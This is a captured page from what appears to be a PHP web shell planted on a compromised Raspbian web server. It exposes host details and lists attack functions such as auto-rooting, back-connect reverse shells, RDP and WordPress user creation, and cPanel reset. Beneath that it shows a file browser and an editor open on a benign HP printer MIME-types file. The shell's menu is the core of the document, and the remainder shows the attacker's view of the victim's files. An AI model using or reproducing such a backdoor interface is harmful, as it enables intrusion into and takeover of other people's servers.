Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
hplip /
fax /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
806
B
-rw-r--r--
coverpages.py
22.21
KB
-rw-r--r--
fax.py
31.45
KB
-rw-r--r--
faxdevice.py
2.57
KB
-rw-r--r--
ledmfax.py
34.01
KB
-rw-r--r--
ledmsoapfax.py
3.63
KB
-rw-r--r--
marvellfax.py
36.16
KB
-rw-r--r--
pmlfax.py
41.99
KB
-rw-r--r--
pstotiff
1.04
KB
-rw-r--r--
pstotiff.convs
778
B
-rw-r--r--
pstotiff.types
2.04
KB
-rw-r--r--
soapfax.py
28.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pstotiff.types
# Copyright 2010-2011 by HP. # ######################################################################## # # Format of Lines: # # super/type rules # # "rules" can be any combination of: # # ( expr ) Parenthesis for expression grouping # + Logical AND # , or whitespace Logical OR # ! Logical NOT # match("pattern") Pattern match on filename # extension Pattern match on "*.extension" # ascii(offset,length) True if bytes are valid printable ASCII # (CR, NL, TAB, BS, 32-126) # printable(offset,length) True if bytes are printable 8-bit chars # (CR, NL, TAB, BS, 32-126, 128-254) # string(offset,"string") True if bytes are identical to string # istring(offset,"string") True if bytes are identical to # case-insensitive string # char(offset,value) True if byte is identical # short(offset,value) True if 16-bit integer is identical # int(offset,value) True if 32-bit integer is identical # locale("string") True if current locale matches string # contains(offset,range,"string") True if the range contains the string # # General Notes: # # MIME type names are case-insensitive. Internally they are converted # to lowercase. Multiple occurrences of a type will cause the provided # rules to be appended to the existing definition. Type names are sorted # in ascending order, so if two types use the same rules to resolve a type # (e.g. doc extension for two types), the returned type will be the first # type in the sorted list. # # The "printable" rule differs from the "ascii" rule in that it also # accepts 8-bit characters in the range 128-255. # # String constants must be surrounded by "" if they contain whitespace. # To insert binary data into a string, use the <hex> notation. # ######################################################################## # # Application-generated files... # #application/vnd.hplip-tiff tiff tif string(0,MM<002A>) string(0,II<2A00>) image/tiff tiff tif string(0,MM<002A>) string(0,II<2A00>)
Close